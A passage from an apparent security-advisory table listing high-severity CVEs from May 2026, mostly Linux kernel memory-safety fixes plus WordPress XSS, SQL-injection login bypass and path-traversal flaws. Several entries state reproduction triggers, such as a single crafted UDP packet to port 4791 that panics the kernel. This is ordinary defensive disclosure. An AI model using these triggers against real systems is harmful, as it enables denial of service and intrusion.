stmmac_rx_refill() succeeds, but fully prevents the `cur_rx == dirty_rx` ambiguity as the previous bugfix intended: so remove the clamp as well. Since stmmac_rx_zc() is a copy-paste-and-tweak of stmmac_rx() and the code structure is identical, any fix to stmmac_rx() will also need a corresponding fix for stmmac_rx_zc(). Therefore, apply the same check there. In stmmac_rx() (not stmmac_rx_zc()), a related bug remains: after the MAC sets OWN=0 on the final descriptor, it will be unable to send any further DMA-complete IRQs until it's given more `empty` descriptors. Currently, the driver simply *hopes* that the next stmmac_rx_refill() succeeds, risking an indefinite stall of the receive process if not. But this is not a regression, so it can be addressed in a future change. | 2026-05-28 | 7.5 | CVE-2026-46110 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_conn: fix potential UAF in create_big_sync Add hci_conn_valid() check in create_big_sync() to detect stale connections before proceeding with BIG creation. Handle the resulting -ECANCELED in create_big_complete() and re-validate the connection under hci_dev_lock() before dereferencing, matching the pattern used by create_le_conn_complete() and create_pa_complete(). Keep the hci_conn object alive across the async boundary by taking a reference via hci_conn_get() when queueing create_big_sync(), and dropping it in the completion callback. The refcount and the lock are complementary: the refcount keeps the object allocated, while hci_dev_lock() serializes hci_conn_hash_del()'s list_del_rcu() on hdev->conn_hash, as required by hci_conn_del(). hci_conn_put() is called outside hci_dev_unlock() so the final put (which resolves to kfree() via bt_link_release) does not run under hdev->lock, though the release path would be safe either way. Without this, create_big_complete() would unconditionally dereference the conn pointer on error, causing a use-after-free via hci_connect_cfm() and hci_conn_del(). | 2026-05-28 | 7.8 | CVE-2026-46111 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix unlocked call to hns_roce_qp_remove() Sashiko points out that hns_roce_qp_remove() requires the caller to hold locks. The error flow in hns_roce_create_qp_common() doesn't hold those locks for the error unwind so it risks corrupting memory. Grab the same locks the other two callers use. | 2026-05-28 | 7.8 | CVE-2026-46112 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Reject non-8-byte ATOMIC_WRITE payloads atomic_write_reply() at drivers/infiniband/sw/rxe/rxe_resp.c unconditionally dereferences 8 bytes at payload_addr(pkt): value = *(u64 *)payload_addr(pkt); check_rkey() previously accepted an ATOMIC_WRITE request with pktlen == resid == 0 because the length validation only compared pktlen against resid. A remote initiator that sets the RETH length to 0 therefore reaches atomic_write_reply() with a zero-byte logical payload, and the responder reads sizeof(u64) bytes from past the logical end of the packet into skb->head tailroom, then writes those 8 bytes into the attacker's MR via rxe_mr_do_atomic_write(). That is a remote disclosure of 4 bytes of kernel tailroom per probe (the other 4 bytes are the packet's own trailing ICRC). IBA oA19-28 defines ATOMIC_WRITE as exactly 8 bytes. Anything else is protocol-invalid. Hoist a strict length check into check_rkey() so the responder never reaches the unchecked dereference, and keep the existing WRITE-family length logic for the normal RDMA WRITE path. Reproduced on mainline with an unmodified rxe driver: a sustained zero-length ATOMIC_WRITE probe repeatedly leaks adjacent skb head-buffer bytes into the attacker's MR, including recognisable kernel strings and partial kernel-direct-map pointer words. With this patch applied the responder rejects the PDU and the MR stays all-zero. | 2026-05-28 | 7.5 | CVE-2026-46114 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: defensively unhash xfrm_state lists in __xfrm_state_delete KASAN reproduces a slab-use-after-free in __xfrm_state_delete()'s hlist_del_rcu calls under syzkaller load on linux-6.12.y stable (reproduced on 6.12.47, also reachable via the same code path on torvalds/master and on the ipsec tree). Nine unique signatures cluster in the xfrm_state lifecycle, the load-bearing one being: BUG: KASAN: slab-use-after-free in __hlist_del include/linux/list.h:990 [inline] BUG: KASAN: slab-use-after-free in hlist_del_rcu include/linux/rculist.h:516 [inline] BUG: KASAN: slab-use-after-free in __xfrm_state_delete net/xfrm/xfrm_state.c Write of size 8 at addr ffff8881198bcb70 by task kworker/u8:9/435 Workqueue: netns cleanup_net Call Trace: __hlist_del / hlist_del_rcu __xfrm_state_delete xfrm_state_delete xfrm_state_flush xfrm_state_fini ops_exit_list cleanup_net The other observed signatures hit the same slab object from __xfrm_state_lookup, xfrm_alloc_spi, __xfrm_state_insert and an OOB write variant of __xfrm_state_delete, all on the byseq/byspi hash chains. __xfrm_state_delete() guards its byseq and byspi unhashes with value-based predicates: if (x->km.seq) hlist_del_rcu(&x->byseq); if (x->id.spi) hlist_del_rcu(&x->byspi); while everywhere else in the file (e.g. state_cache, state_cache_input) the safer hlist_unhashed() check is used. xfrm_alloc_spi() sets x->id.spi = newspi inside xfrm_state_lock and then immediately inserts into byspi, but a path that observes x->id.spi != 0 outside of xfrm_state_lock can still skip-or-hit the byspi unhash inconsistently with whether x is actually on the list. The same holds for x->km.seq versus byseq, and the bydst/bysrc unhashes have no predicate at all, so a second __xfrm_state_delete() on the same object writes through LIST_POISON pprev. The defensive change here: - Use hlist_del_init_rcu() instead of hlist_del_rcu() on bydst, bysrc, byseq and byspi so a second deletion is a no-op rather than a write through LIST_POISON pprev. The byseq/byspi nodes are already initialised in xfrm_state_alloc(). - Test hlist_unhashed() rather than the value predicate for byseq/byspi, so the unhash decision tracks list state rather than mutable scalar fields. Empirical verification: applied this patch on top of v6.12.47, rebuilt, and re-ran the same syzkaller harness for 1h16m on a previously-crashy configuration that produced ~100 hits each of slab-use-after-free Read in xfrm_alloc_spi / Read in __xfrm_state_lookup / Write in __xfrm_state_delete. After the patch, 7.1M execs across 32 VMs at ~1550 exec/sec produced zero xfrm_state UAF/OOB hits. /proc/slabinfo confirms the xfrm_state slab is actively allocated and freed during the run (~143 KiB resident), so the fuzzer is still exercising those code paths -- they just no longer crash. Reproduction: - Linux 6.12.47 x86_64 + KASAN_GENERIC + KASAN_INLINE + KCOV - syzkaller @ 746545b8b1e4c3a128db8652b340d3df90ce61db - 32 QEMU/KVM VMs x 2 vCPU on AWS c5.metal bare metal - 9 unique signatures collected in ~9h, all within xfrm_state lifecycle | 2026-05-28 | 7.8 | CVE-2026-46116 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana: Remove user triggerable WARN_ON() in mana_ib_create_qp_rss() Sashiko points out that the user can specify WQs sharing the same CQ as a part of the uAPI and this will trigger the WARN_ON() then go on to corrupt the kernel. Just reject it outright and fail the QP creation. | 2026-05-28 | 7.8 | CVE-2026-46117 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ip6_gre: Use cached t->net in ip6erspan_changelink(). After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns ip6gre hash via link_net. ip6erspan_changelink() was not converted in that series and still uses dev_net(dev), which diverges from the device's creation netns after IFLA_NET_NS_FD migration. This re-inserts the tunnel into the wrong per-netns hash. The original netns keeps a stale entry. When that netns is later destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a slab-use-after-free reported by KASAN, followed by a kernel BUG at net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify(). Reachable from an unprivileged user namespace (unshare --user --map-root-user --net). ip6gre_changelink() earlier in the same file already uses the cached t->net; only ip6erspan_changelink() has the wrong shape. | 2026-05-28 | 7.8 | CVE-2026-46120 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: virtio_bt: clamp rx length before skb_put virtbt_rx_work() calls skb_put(skb, len) where len comes directly from virtqueue_get_buf() with no validation against the buffer we posted to the device. The RX skb is allocated in virtbt_add_inbuf() and exposed to virtio as exactly 1000 bytes via sg_init_one(). Checking len against skb_tailroom(skb) is not sufficient because alloc_skb() can leave more tailroom than the 1000 bytes actually handed to the device. A malicious or buggy backend can therefore report used.len between 1001 and skb_tailroom(skb), causing skb_put() to include uninitialized kernel heap bytes that were never written by the device. The same path also accepts len == 0, in which case skb_put(skb, 0) leaves the skb empty but virtbt_rx_handle() still reads the pkt_type byte from skb->data, consuming uninitialized memory. Define VIRTBT_RX_BUF_SIZE once and reuse it in alloc_skb() and sg_init_one(), and gate virtbt_rx_work() on that same constant so the bound checked matches the buffer actually exposed to the device. Reject used.len == 0 in the same gate so an empty completion can no longer reach virtbt_rx_handle(). Use bt_dev_err_ratelimited() because the length value comes from an untrusted backend that can otherwise flood the kernel log. Same class of bug as commit c04db81cd028 ("net/9p: Fix buffer overflow in USB transport layer"), which hardened the USB 9p transport against unchecked device-reported length. | 2026-05-28 | 7.7 | CVE-2026-46123 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: isofs: validate block number from NFS file handle in isofs_export_iget isofs_fh_to_dentry() and isofs_fh_to_parent() pass an attacker- controlled block number (ifid->block or ifid->parent_block) from the NFS file handle to isofs_export_iget(), which only rejects block == 0 before calling isofs_iget() and ultimately sb_bread(). A crafted file handle with fh_len sufficient to pass the check added by commit 0405d4b63d08 ("isofs: Prevent the use of too small fid") can still drive the server to read any in-range block on the backing device as if it were an iso_directory_record. That earlier fix was assigned CVE-2025-37780. sb_bread() on an out-of-range block returns NULL cleanly via the EIO path, so there is no memory-safety violation. For in-range reads of adjacent-partition data on the same block device, the unrelated bytes end up in iso_inode_info fields that reach the NFS client as dentry metadata. The deployment surface (isofs exported over NFS from loop-mounted images) is narrow and requires an authenticated NFS peer, but the malformed-file-handle class is reportable as hardening next to the existing CVE-2025-37780 fix. Reject block >= ISOFS_SB(sb)->s_nzones in isofs_export_iget() so the check covers both isofs_fh_to_dentry() and isofs_fh_to_parent() call sites with a single line. | 2026-05-28 | 7.5 | CVE-2026-46124 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix double free in create_space_info() error path When kobject_init_and_add() fails, the call chain is: create_space_info() -> btrfs_sysfs_add_space_info_type() -> kobject_init_and_add() -> failure -> kobject_put(&space_info->kobj) -> space_info_release() -> kfree(space_info) Then control returns to create_space_info(): btrfs_sysfs_add_space_info_type() returns error -> goto out_free -> kfree(space_info) This causes a double free. Keep the direct kfree(space_info) for the earlier failure path, but after btrfs_sysfs_add_space_info_type() has called kobject_put(), let the kobject release callback handle the cleanup. | 2026-05-28 | 7.8 | CVE-2026-46129 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Reject unknown opcodes before ICRC processing Even after applying commit 7244491dab34 ("RDMA/rxe: Validate pad and ICRC before payload_size() in rxe_rcv"), a single unauthenticated UDP packet can still trigger panic. That patch handled payload_size() underflow only for valid opcodes with short packets, not for packets carrying an unknown opcode. The unknown-opcode OOB read described below predates that commit and reaches back to the initial Soft RoCE driver. The check added there reads pkt->paylen < header_size(pkt) + bth_pad(pkt) + RXE_ICRC_SIZE where header_size(pkt) expands to rxe_opcode[pkt->opcode].length. The rxe_opcode[] array has 256 entries but is only populated for defined IB opcodes; any other entry (for example opcode 0xff) is zero-initialized, so length == 0 and the check degenerates to pkt->paylen < 0 + bth_pad(pkt) + RXE_ICRC_SIZE which does not constrain pkt->paylen enough. rxe_icrc_hdr() then computes rxe_opcode[pkt->opcode].length - RXE_BTH_BYTES which underflows when length == 0 and passes a huge value to rxe_crc32(), causing an out-of-bounds read of the skb payload. Reproduced on v7.0-rc7 with that fix applied, QEMU/KVM with CONFIG_RDMA_RXE=y and CONFIG_KASAN=y, after rdma link add rxe0 type rxe netdev eth0 A single 48-byte UDP packet to port 4791 with BTH opcode=0xff and QPN=IB_MULTICAST_QPN triggers: BUG: KASAN: slab-out-of-bounds in crc32_le+0x115/0x170 Read of size 1 at addr ... The buggy address is located 0 bytes to the right of allocated 704-byte region Call Trace: crc32_le+0x115/0x170 rxe_icrc_hdr.isra.0+0x226/0x300 rxe_icrc_check+0x13f/0x3a0 rxe_rcv+0x6e1/0x16e0 rxe_udp_encap_recv+0x20a/0x320 udp_queue_rcv_one_skb+0x7ed/0x12c0 Subsequent packets with the same shape fault on unmapped memory and panic the kernel. The trigger requires only module load and "rdma link add"; no QP, no connection, and no authentication. Fix this by rejecting packets whose opcode has no rxe_opcode[] entry, detected via the zero mask or zero length, before any length arithmetic runs. | 2026-05-28 | 7.5 | CVE-2026-46133 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana: Validate rx_hash_key_len Sashiko points out that rx_hash_key_len comes from a uAPI structure and is blindly passed to memcpy, allowing the userspace to trash kernel memory. Bounds check it so the memcpy cannot overflow. | 2026-05-28 | 7.8 | CVE-2026-46145 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: configfs: Bound snprintf() return in tg_pt_gp_members_show() target_tg_pt_gp_members_show() formats LUN paths with snprintf() into a 256-byte stack buffer, then will memcpy() cur_len bytes from that buffer. snprintf() returns the length the output would have had, which can exceed the buffer size when the fabric WWN is long because iSCSI IQN names can be up to 223 bytes. The check at the memcpy() site only guards the destination page write, not the source read, so memcpy() will read past the stack buffer and copy adjacent stack contents to the sysfs reader, which when CONFIG_FORTIFY_SOURCE is enabled, fortify_panic() will be triggered. Commit 27e06650a5ea ("scsi: target: target_core_configfs: Add length check to avoid buffer overflow") added the same bound to the target_lu_gp_members_show() but the tg_pt_gp variant was missed so resolve that here. | 2026-05-28 | 7.1 | CVE-2026-46149 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fanotify: fix false positive on permission events fsnotify_get_mark_safe() may return false for a mark on an unrelated group, which results in bypassing the permission check. Fix by skipping over detached marks that are not in the current group. | 2026-05-28 | 7.1 | CVE-2026-46150 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Read scx_root under scx_cgroup_ops_rwsem in cgroup setters scx_group_set_{weight,idle,bandwidth}() cache scx_root before acquiring scx_cgroup_ops_rwsem, so the pointer can be stale by the time the op runs. If the loaded scheduler is disabled and freed (via RCU work) and another is enabled between the naked load and the rwsem acquire, the reader sees scx_cgroup_enabled=true (the new scheduler's) but dereferences the freed one - UAF on SCX_HAS_OP(sch, ...) / SCX_CALL_OP(sch, ...). scx_cgroup_enabled is toggled only under scx_cgroup_ops_rwsem write (scx_cgroup_{init,exit}), so reading scx_root inside the rwsem read section correlates @sch with the enabled snapshot. | 2026-05-28 | 7 | CVE-2026-46154 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: oss: Fix data race at accessing runtime.oss.trigger Currently the runtime.oss.trigger field may be accessed concurrently without protection, which may lead to the data race. And, in this case, it may lead to more severe problem because it's a bit field; as writing the data, it may overwrite other bit fields as well, which confuses the operation completely, as spotted by fuzzing. Fix it by covering runtime.oss.trigger bit fled also with the existing params_lock mutex in both snd_pcm_oss_get_trigger() and snd_pcm_oss_poll(). | 2026-05-28 | 7.8 | CVE-2026-46157 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix double free in create_space_info_sub_group() error path When kobject_init_and_add() fails, the call chain is: create_space_info_sub_group() -> btrfs_sysfs_add_space_info_type() -> kobject_init_and_add() -> failure -> kobject_put(&sub_group->kobj) -> space_info_release() -> kfree(sub_group) Then control returns to create_space_info_sub_group(), where: btrfs_sysfs_add_space_info_type() returns error -> kfree(sub_group) Thus, sub_group is freed twice. Keep parent->sub_group[index] = NULL for the failure path, but after btrfs_sysfs_add_space_info_type() has called kobject_put(), let the kobject release callback handle the cleanup. | 2026-05-28 | 7 | CVE-2026-46164 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exit: prevent preemption of oopsing TASK_DEAD task When an already-exiting task oopses, make_task_dead() currently calls do_task_dead() with preemption enabled. That is forbidden: do_task_dead() calls __schedule(), which has a comment saying "WARNING: must be called with preemption disabled!". If an oopsing task is preempted in do_task_dead(), between becoming TASK_DEAD and entering the scheduler explicitly, bad things happen: finish_task_switch() assumes that once the scheduler has switched away from a TASK_DEAD task, the task can never run again and its stack is no longer needed; but that assumption apparently doesn't hold if the dead task was preempted (the SM_PREEMPT case). This means that the scheduler ends up repeatedly dropping references on the dead task's stack, which can lead to use-after-free or double-free of the entire task stack; in other words, two tasks can end up running on the same stack, resulting in various kinds of memory corruption. (This does not just affect "recursively oopsing" tasks; it is enough to oops once during task exit, for example in a file_operations::release handler) | 2026-05-28 | 7.8 | CVE-2026-46173 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix fsck inconsistency caused by FGGC of node block During FGGC node block migration, fsck may incorrectly treat the migrated node block as fsync-written data. The reproduction scenario: root@vm:/mnt/f2fs# seq 1 2048 | xargs -n 1 ./test_sync // write inline inode and sync root@vm:/mnt/f2fs# rm -f 1 root@vm:/mnt/f2fs# sync root@vm:/mnt/f2fs# f2fs_io gc_range // move data block in sync mode and not write CP SPO, "fsck --dry-run" find inode has already checkpointed but still with DENT_BIT_SHIFT set The root cause is that GC does not clear the dentry mark and fsync mark during node block migration, leading fsck to misinterpret them as user-issued fsync writes. In BGGC mode, node block migration is handled by f2fs_sync_node_pages(), which guarantees the dentry and fsync marks are cleared before writing. This patch move the set/clear of the fsync|dentry marks into __write_node_folio to make the logic clearer, and ensures the fsync|dentry mark is cleared in FGGC. | 2026-05-28 | 7.1 | CVE-2026-46175 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx5: Fix error path fall-through in mlx5_ib_dev_res_srq_init() mlx5_ib_dev_res_srq_init() allocates two SRQs, s0 and s1. When ib_create_srq() fails for s1, the error branch destroys s0 but falls through and unconditionally assigns the freed s0 and the ERR_PTR s1 to devr->s0 and devr->s1. This leads to several problems: the lock-free fast path checks "if (devr->s1) return 0;" and treats the ERR_PTR as already initialised; users in mlx5_ib_create_qp() dereference the freed SRQ or ERR_PTR via to_msrq(devr->s0)->msrq.srqn; and mlx5_ib_dev_res_cleanup() dereferences the ERR_PTR and double-frees s0 on teardown. Fix by adding the same `goto unlock` in the s1 failure path. | 2026-05-28 | 7.8 | CVE-2026-46176 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi: Add limits to event and receive message requests The driver would just fetch events and receive messages until the BMC said it was done. To avoid issues with BMCs that never say they are done, add a limit of 10 fetches at a time. In addition, an si interface has an attn state it can return from the hardware which is supposed to cause a flag fetch to see if the driver needs to fetch events or message or a few other things. If the attn bit gets stuck, it's a similar problem. So allow messages in between flag fetches so the driver itself doesn't get stuck. This is a more general fix than the previous fix for the specific bad BMC, but should fix the more general issue of a BMC that won't stop saying it has data. This has been there from the beginning of the driver. It's not a bug per-se, but it is accounting for bugs in BMCs. | 2026-05-28 | 7.5 | CVE-2026-46177 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx4: Fix resource leak on error in mlx4_ib_create_srq() Sashiko points out that mlx4_srq_alloc() was not undone during error unwind, add the missing call to mlx4_srq_free(). | 2026-05-28 | 7.8 | CVE-2026-46178 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx4: Fix mis-use of RCU in mlx4_srq_event() Sashiko points out the radix_tree itself is RCU safe, but nothing ever frees the mlx4_srq struct with RCU, and it isn't even accessed within the RCU critical section. It also will crash if an event is delivered before the srq object is finished initializing. Use the spinlock since it isn't easy to make RCU work, use refcount_inc_not_zero() to protect against partially initialized objects, and order the refcount_set() to be after the srq is fully initialized. | 2026-05-28 | 7.8 | CVE-2026-46181 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: spi-nor: debugfs: fix out-of-bounds read in spi_nor_params_show() Sashiko noticed an out-of-bounds read [1]. In spi_nor_params_show(), the snor_f_names array is passed to spi_nor_print_flags() using sizeof(snor_f_names). Since snor_f_names is an array of pointers, sizeof() returns the total number of bytes occupied by the pointers (element_count * sizeof(void *)) rather than the element count itself. On 64-bit systems, this makes the passed length 8x larger than intended. Inside spi_nor_print_flags(), the 'names_len' argument is used to bounds-check the 'names' array access. An out-of-bounds read occurs if a flag bit is set that exceeds the array's actual element count but is within the inflated byte-size count. Correct this by using ARRAY_SIZE() to pass the actual number of string pointers in the array. | 2026-05-28 | 7.1 | CVE-2026-46190 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: validate SVM ioctl nattr against buffer size Validate nattr field against the buffer size, preventing out-of-bounds buffer access via user-controlled attribute count. (cherry picked from commit 5eca8bfdfa456c3304ca77523718fe24254c172f) | 2026-05-28 | 7.8 | CVE-2026-46197 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn4: Prevent OOB reads when parsing dec msg Check bounds against the end of the BO whenever we access the msg. | 2026-05-28 | 7.1 | CVE-2026-46199 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix dma-buf attachment leak in xe_gem_prime_import() When xe_dma_buf_init_obj() fails, the attachment from dma_buf_dynamic_attach() is not detached. Add dma_buf_detach() before returning the error. Note: we cannot use goto out_err here because xe_dma_buf_init_obj() already frees bo on failure, and out_err would double-free it. (cherry picked from commit a828eb185aac41800df8eae4b60501ccc0dbbe51) | 2026-05-28 | 7.8 | CVE-2026-46201 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn4: Prevent OOB reads when parsing IB Rewrite the IB parsing to use amdgpu_ib_get_value() which handles the bounds checks. | 2026-05-28 | 7.1 | CVE-2026-46204 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: media: atomisp: Disallow all private IOCTLs Disallow all private IOCTLs. These aren't quite as safe as one could assume of IOCTL handlers; disable them for now. Instead of removing the code, return in the beginning of the function if cmd is non-zero in order to keep static checkers happy. | 2026-05-28 | 7.8 | CVE-2026-46205 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: reject new tp_meter sessions during teardown Prevent tp_meter from starting new sender or receiver sessions after mesh_state has left BATADV_MESH_ACTIVE. | 2026-05-28 | 7.8 | CVE-2026-46206 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: stop tp_meter sessions during mesh teardown TP meter sessions remain linked on bat_priv->tp_list after the netlink request has already finished. When the mesh interface is removed, batadv_mesh_free() currently tears down the mesh without first draining these sessions. A running sender thread or a late incoming tp_meter packet can then keep processing against a mesh instance which is already shutting down. Synchronize tp_meter with the mesh lifetime by stopping all active sessions from batadv_mesh_free() and waiting for sender threads to exit before teardown continues. | 2026-05-28 | 7.8 | CVE-2026-46208 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/gem: Fix inconsistent plane dimension calculation in drm_gem_fb_init_with_funcs() drm_gem_fb_init_with_funcs() computes sub-sampled plane dimensions using plain integer division: unsigned int width = mode_cmd->width / (i ? info->hsub : 1); unsigned int height = mode_cmd->height / (i ? info->vsub : 1); However, the ioctl-level framebuffer_check() in drm_framebuffer.c uses drm_format_info_plane_width/height() which round up dimensions via DIV_ROUND_UP(). This inconsistency corrupts the subsequent GEM object size check for certain pixel format and dimension combinations. For example, with NV12 (vsub=2) and a 1-pixel-tall framebuffer the GEM size validation path sees height=0 instead of height=1. The expression (height - 1) then wraps to UINT_MAX as an unsigned int, causing min_size to overflow and wrap back to a small value. A tiny GEM object therefore passes the size guard, yet when the GPU accesses the chroma plane it will read or write memory beyond the object's bounds. Fix by replacing the open-coded divisions with drm_format_info_plane_width() and drm_format_info_plane_height(), which use DIV_ROUND_UP() and match the calculation already used in framebuffer_check(). | 2026-05-28 | 7.8 | CVE-2026-46209 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: fix use-after-free of fmt_src during MBPF check During concurrency testing, multiple instances can run in parallel, and each instance uses its own inst->lock while the core->lock protects the list of active instances. The race happens because these locks cover different scopes, inst->lock protects only the internals of a single instance, while the Macro Blocks Per Frame (MBPF) checker walks the core list under core->lock and reads fields like fmt_src->width and fmt_src->height. At the same time, iris_close() may free fmt_src and fmt_dst under inst->lock while the instance is still present in the core list. This allows a situation where the MBPF checker, still iterating through the core list, reaches an instance whose fmt_src was already freed by another thread and ends up dereferencing a dangling pointer, resulting in a use-after-free. This happens because the MBPF checker assumes that any instance in the core list is fully valid, but the freeing of fmt_src and fmt_dst without removing the instance from the core list is not correct. The correct ordering is to defer freeing fmt_src and fmt_dst until after the instance has been removed from the core list and all teardown under the core lock has completed, ensuring that no dangling pointers are ever exposed during MBPF checks. | 2026-05-28 | 7.8 | CVE-2026-46210 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: Set old handle to NULL before prime swap in change_handle There was a potential race condition in change_handle. The ioctl briefly had a single object with two idr entries; a concurrent gem_close could delete the object and remove one of the handles while leaving the other one dangling, which could subsequently be dereferenced for a use-after-free. To fix this, do the same dance that gem_close itself does. (f6cd7daecff5 drm: Release driver references to handle before making it available again) First idr_replace the old handle to NULL. Later, if the prime operations are successful, actually close it. create_tail required a similar dance to avoid a similar problem. (bd46cece51a3 drm/gem: Fix race in drm_gem_handle_create_tail()) It idr_allocs the new handle with NULL, then swaps in the correct object later to avoid races. We don't need to do that here, since the only operations that could race are drm_prime, and change_handle holds the prime lock for the entire duration. v2: cleanups of error paths | 2026-05-28 | 7.8 | CVE-2026-46215 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Add bounds checking to ib_{get,set}_value The uvd/vce/vcn code accesses the IB at predefined offsets without checking that the IB is large enough. Check the bounds here. The caller is responsible for making sure it can handle arbitrary return values. Also make the idx a uint32_t to prevent overflows causing the condition to fail. | 2026-05-28 | 7.1 | CVE-2026-46218 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sctp: revalidate list cursor after sctp_sendmsg_to_asoc() in SCTP_SENDALL The SCTP_SENDALL path in sctp_sendmsg() iterates ep->asocs with list_for_each_entry_safe(), which caches the next entry in @tmp before the loop body runs. The body calls sctp_sendmsg_to_asoc(), which may drop the socket lock inside sctp_wait_for_sndbuf(). While the lock is dropped, another thread can SCTP_SOCKOPT_PEELOFF the association cached in @tmp, migrating it to a new endpoint via sctp_sock_migrate() (list_del_init() + list_add_tail() to newep->asocs), and optionally close the new socket which frees the association via kfree_rcu(). The cached @tmp can also be freed by a network ABORT for that association, processed in softirq while the lock is dropped. sctp_wait_for_sndbuf() revalidates @asoc (the current entry) on re-lock via the "sk != asoc->base.sk" and "asoc->base.dead" checks, but nothing revalidates @tmp. After a successful return, the iterator advances to the stale @tmp, yielding either a use-after-free (if the peeled socket was closed) or a list-walk onto the new endpoint's list head (type confusion of &newep->asocs as a struct sctp_association *). Both are reachable from CapEff=0; the type-confusion path gives controlled indirect call via the outqueue.sched->init_sid pointer. Fix by re-deriving @tmp from @asoc after sctp_sendmsg_to_asoc() returns. @asoc is known to still be on ep->asocs at that point: the only callers that list_del an association from ep->asocs are sctp_association_free() (which sets asoc->base.dead) and sctp_assoc_migrate() (which changes asoc->base.sk), and sctp_wait_for_sndbuf() checks both under the lock before any successful return; a tripped check propagates as err < 0 and the loop bails before the re-derive. The SCTP_ABORT path in sctp_sendmsg_check_sflags() returns 0 and the loop hits 'continue' before sctp_sendmsg_to_asoc() is ever called, so the @tmp cached by list_for_each_entry_safe() still covers the lock-held free that ba59fb027307 ("sctp: walk the list of asoc safely") was added for. | 2026-05-28 | 7.8 | CVE-2026-46227 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn3: Prevent OOB reads when parsing dec msg Check bounds against the end of the BO whenever we access the msg. | 2026-05-28 | 7.1 | CVE-2026-46230 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/vcn3: Avoid overflow on msg bound check As pointed out by SDL, the previous condition may be vulnerable to overflow. (cherry picked from commit db00257ac9e4a51eb2515aaea161a019f7125e10) | 2026-05-28 | 7.1 | CVE-2026-46237 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: Fix use-after-free in iris_release_internal_buffers() The recent change in commit 1dabf00ee206 ("media: iris: gen1: Destroy internal buffers after FW releases") introduced a regression where session_release_buf() may free the buffer. The caller, iris_release_internal_buffers(), continued to access `buffer` after the call, leading to a potential use-after-free. Fix this by setting BUF_ATTR_PENDING_RELEASE before calling session_release_buf(), and reverting the flag if the call fails. This ensures no dereference occurs after potential freeing. | 2026-05-28 | 7.8 | CVE-2026-46240 |
| litespeedtech--LiteSpeed Cache | The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the /wp-json/litespeed/v1/notify_ccss and /wp-json/litespeed/v1/notify_ucss REST API endpoints in all versions up to, and including, 7.7. These endpoints accept CSS content from QUIC.cloud callback notifications and store it to disk without sanitization. The stored content is later rendered inline frontend page loads without output escaping. The access control protecting these endpoints is IP-based validation that can potentially be bypassed when the WordPress site is deployed behind a reverse proxy, load balancer, or CDN with certain configurations. This makes it possible for unauthenticated attackers, under certain conditions, to inject arbitrary JavaScript into CCSS/UCSS content. | 2026-05-27 | 7.2 | CVE-2026-3375 |
| Livebms--Gate Pass Management System | Gate Pass Management System 2.1 contains an SQL injection vulnerability that allows unauthenticated attackers to bypass authentication by injecting SQL code through the login and password parameters. Attackers can submit crafted POST requests to login-exec.php with SQL injection payloads in form parameters to authenticate without valid credentials and gain access to the application. | 2026-05-30 | 8.2 | CVE-2018-25424 |
| Ludwig You--QuickWebP – Compress / Optimize Images & Convert WebP | SEO Friendly | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Ludwig You QuickWebP – Compress / Optimize Images & Convert WebP | SEO Friendly quickwebp allows Path Traversal.This issue affects QuickWebP – Compress / Optimize Images & Convert WebP | SEO Friendly: from n/a through <= 3.2.7. | 2026-05-27 | 9.9 | CVE-2026-42756 |
